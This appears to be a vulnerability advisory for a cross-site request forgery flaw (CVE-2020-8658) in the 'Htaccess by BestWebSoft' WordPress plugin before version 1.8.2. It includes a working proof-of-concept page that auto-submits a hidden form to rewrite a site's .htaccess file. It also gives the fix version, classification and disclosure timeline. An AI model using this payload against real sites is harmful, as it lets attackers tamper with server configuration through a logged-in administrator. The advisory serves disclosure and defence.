Htaccess by BestWebSoft < 1.8.2 - CSRF to edit .htaccess



Proof of Concept
<html>
    <body onload="document.forms[0].submit();">
        <form action="https://[WP]/wp-admin/admin.php?page=htaccess.php&action=htaccess_editor" method="POST">
            <input type="hidden" name="htccss_customise" value="# Modified by CSRF" />
            <input type="hidden" name="htccss_form_custom" value="submit" />
            <input type="hidden" name="htccss_submit_button_custom" value="Save+Changes" />
            <input type="hidden" name="htccss_nonce_name" value="attacker" />
            <input type="hidden" name="_wp_http_referer" value="/wp-admin/admin.php?page=htaccess.php&action=htaccess_editor" />
        </form>
    </body>
</html> 

Affects Plugin

fixed in version 1.8.2

References

CVE 2020-8658
URL https://github.com/V1n1v131r4/Exploiting-WP-Htaccess-by-BestWebSoft-Plugin/blob/master/README.md

Classification

Type CSRF
CWE CWE-352

Miscellaneous

Original Researcher V1n1v131r4
Views 3683
Verified Yes
WPVDB ID 10060

Timeline

Publicly Published 2020-02-01 (about 2 months ago)
Added 2020-02-06 (about 2 months ago)
Last Updated 2020-03-13 (15 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin